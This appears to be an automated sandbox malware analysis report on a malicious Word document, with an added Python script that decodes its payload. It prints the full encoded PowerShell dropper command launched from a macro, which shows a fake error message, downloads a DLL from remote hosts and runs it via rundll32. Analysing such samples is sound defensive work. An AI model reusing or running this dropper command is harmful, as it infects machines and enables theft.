Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FE499 11_2_002FE499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0030C48F 11_2_0030C48F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FA4E1 11_2_002FA4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00305CCB 11_2_00305CCB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F6D2C 11_2_002F6D2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00305136 11_2_00305136
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FDD24 11_2_002FDD24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F3521 11_2_002F3521
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F510E 11_2_002F510E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00301913 11_2_00301913
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00307D78 11_2_00307D78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0030BD5E 11_2_0030BD5E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F415F 11_2_002F415F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F75A0 11_2_002F75A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F4DB8 11_2_002F4DB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003041AD 11_2_003041AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0030B59B 11_2_0030B59B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0030A59F 11_2_0030A59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F7D94 11_2_002F7D94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00302DE1 11_2_00302DE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F0A00 11_2_002F0A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00302A00 11_2_00302A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00311600 11_2_00311600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F2A18 11_2_002F2A18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F6A6F 11_2_002F6A6F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FCA68 11_2_002FCA68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00308279 11_2_00308279
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00301E7D 11_2_00301E7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F367A 11_2_002F367A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00306E50 11_2_00306E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003112B6 11_2_003112B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003002A0 11_2_003002A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F5EBA 11_2_002F5EBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F06B6 11_2_002F06B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003066AE 11_2_003066AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F628A 11_2_002F628A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F6EE4 11_2_002F6EE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00308EE2 11_2_00308EE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003096EA 11_2_003096EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FC6CE 11_2_002FC6CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003006D1 11_2_003006D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00306AD5 11_2_00306AD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FD2C9 11_2_002FD2C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FAF28 11_2_002FAF28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0030473C 11_2_0030473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00307713 11_2_00307713
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FFB05 11_2_002FFB05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FEF04 11_2_002FEF04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F8B16 11_2_002F8B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FD760 11_2_002FD760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00304F60 11_2_00304F60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F1B46 11_2_002F1B46
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F5742 11_2_002F5742
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FCF5B 11_2_002FCF5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00302B45 11_2_00302B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00304B48 11_2_00304B48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F8355 11_2_002F8355
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0030BFB0 11_2_0030BFB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F5BAC 11_2_002F5BAC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F33AB 11_2_002F33AB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FA7A2 11_2_002FA7A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FF3B5 11_2_002FF3B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FE380 11_2_002FE380
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F2F97 11_2_002F2F97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00309BE4 11_2_00309BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FABF8 11_2_002FABF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F27F4 11_2_002F27F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002F77F0 11_2_002F77F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002FB7C2 11_2_002FB7C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A6C05 12_2_004A6C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A6E8A 12_2_004A6E8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B5748 12_2_004B5748
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AE360 12_2_004AE360
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AFB04 12_2_004AFB04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A9716 12_2_004A9716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A4121 12_2_004A4121
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B533C 12_2_004B533C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004BA7E4 12_2_004BA7E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A83F0 12_2_004A83F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004BC19B 12_2_004BC19B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004B4DAD 12_2_004B4DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004A884A 12_2_004A884A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_004AD04B 12_2_004AD04B
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: DAT.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module T6dwlv_ivpoiq2, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: DAT.doc OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1000E380 appears 41 times
Yara signature match
Source: 00000005.00000002.2138019176.00000000003B6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2138066373.0000000001CF4000.00000004.00000040.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: Lyeta6ud.dll.5.dr Static PE information: Section: .rsrc ZLIB complexity 0.995406845869
Source: rundll32.exe, 00000006.00000002.2144951796.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2140287437.0000000001DB0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2142959855.0000000001EC0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@36/9@2/5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 20_2_00206686 CreateToolhelp32Snapshot, 20_2_00206686
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$DAT.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDDA1.tmp
Source: DAT.doc OLE indicator, Word Document stream: true
Source: DAT.doc OLE document summary: title field not present or empty
Source: DAT.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: Async message sent to session Console
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ...es are "Ssl3, Tls"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: At line:1 char:535
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............Q..j....@J_...............X.............}..v............0...............................0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j....p.................X.............}..v............0................G_.............0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../...............Q..j....@J_...............X.............}..v....@.......0.......................r.......0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../..................j......................X.............}..v....x.......0................G_.............0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;....... .......Q..j....@J_...............X.............}..v............0................F_.............0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;..................j......................X.............}..v....@.......0................G_.............0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................J.j....E.................X.............}..v......&.....0...............X._.............0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................J.j....E.................X.............}..v.... R&.....0...............X._.............0............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1
Source: DAT.doc Virustotal: Detection: 71%
Source: DAT.doc ReversingLabs: Detection: 82%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0A
GcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yozs\bhycn.bcx',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hxqt\iieutea.ehw',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hszr\zft.hxn',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vnjt\awo.cnn',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dkpu\lbsvbo.gas',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Opqf\zrop.pvh',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Blgp\gmlbr.kph',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mnrm\xmfd.ucf',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wnoc\mhxywle.szw',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqby\jcrucsb.dql',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Etxd\pkvco.wzp',RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eiig\mmslr.ajj',RunDLL
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1 Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll #1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yozs\bhycn.bcx',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hxqt\iieutea.ehw',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hszr\zft.hxn',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vnjt\awo.cnn',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dkpu\lbsvbo.gas',RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Opqf\zrop.pvh',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Blgp\gmlbr.kph',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mnrm\xmfd.ucf',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wnoc\mhxywle.szw',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xqby\jcrucsb.dql',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Etxd\pkvco.wzp',RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eiig\mmslr.ajj',RunDLL
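The `-ENCOD` switch in the cmd.exe command line above is PowerShell's `-EncodedCommand` (powershell.exe accepts any unambiguous prefix of a parameter name), so the argument is base64 of UTF-16LE script text. Decoded, the script hides .NET type names and string literals behind `-f` format-string reordering and `'a'+'b'` concatenation; its first statement resolves to `[Type]'System.IO.Directory'`, consistent with the `O_wgqv7\C0316em` directory that the dropped `Lyeta6ud.dll` is written to. The Python below is an added example and not part of the Joe Sandbox report: it decodes the first 184 base64 characters of the page's own argument (the rest is truncated in the report) and strips both obfuscation layers. `CONCAT_FRAGMENT` is a later statement of the same script, decoded the same way, that assembles the dropped file name; the function names are this example's own.

```python
import base64
import re

# The first 184 base64 characters of the "-ENCOD" argument on this page,
# copied from the cmd.exe command line. The report truncates the rest, so
# only this prefix is embedded; it decodes to the loader's first statement.
ENCODED_PREFIX = (
    "IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9"
    "AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcA"
    "LAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAA"
)

# A later statement of the same script, already decoded; it builds the name of
# the dropped file (Lyeta6ud.dll) with nested '+' concatenation.
CONCAT_FRAGMENT = "$Mem0uwr = ('Ly'+('et'+'a6')+'ud');"

# ("{2}{0}{3}{1}" -f 'a','b','c','d'): a template in double quotes, -f, then a
# comma-separated list of single-quoted arguments (unquoted args such as
# [char]92 are deliberately not handled here).
FORMAT_RE = re.compile(r"""\(\s*"((?:\{\d+\})+)"\s*-[fF]\s*('[^']*'(?:\s*,\s*'[^']*')*)\s*\)""")
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")   # 'a'+'b'  -> 'ab'
PAREN_RE = re.compile(r"\(\s*'([^']*)'\s*\)")           # ('x')    -> 'x'


def decode_encoded_command(b64):
    """-EncodedCommand (or any prefix such as -ENCOD) carries base64 of UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def resolve_format_strings(script):
    """Replace every ("{i}{j}..." -f 'x','y',...) with the string it evaluates to."""
    def build(m):
        args = re.findall(r"'([^']*)'", m.group(2))

        def pick(idx):
            i = int(idx.group(1))
            return args[i] if i < len(args) else idx.group(0)  # leave bad indices alone

        return "('" + re.sub(r"\{(\d+)\}", pick, m.group(1)) + "')"
    return FORMAT_RE.sub(build, script)


def collapse_concatenations(script):
    """Fold 'a'+'b' into 'ab' and ('x') into 'x' repeatedly until nothing changes.
    Quote pairing is positional, so a literal containing '+' would confuse it."""
    while True:
        new = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        new = PAREN_RE.sub(lambda m: "'" + m.group(1) + "'", new)
        if new == script:
            return new
        script = new


def deobfuscate(b64):
    return collapse_concatenations(resolve_format_strings(decode_encoded_command(b64)))


if __name__ == "__main__":
    print(decode_encoded_command(ENCODED_PREFIX))
    print(deobfuscate(ENCODED_PREFIX))
    print(collapse_concatenations(CONCAT_FRAGMENT))
```

Run against the full argument (once recovered from the process's command line rather than this truncated report) the same two passes expose the download URLs and the final `rundll32 ... #1` invocation, since Emotet's loader of this period used no other string hiding than these two constructs plus case-mangling.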
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
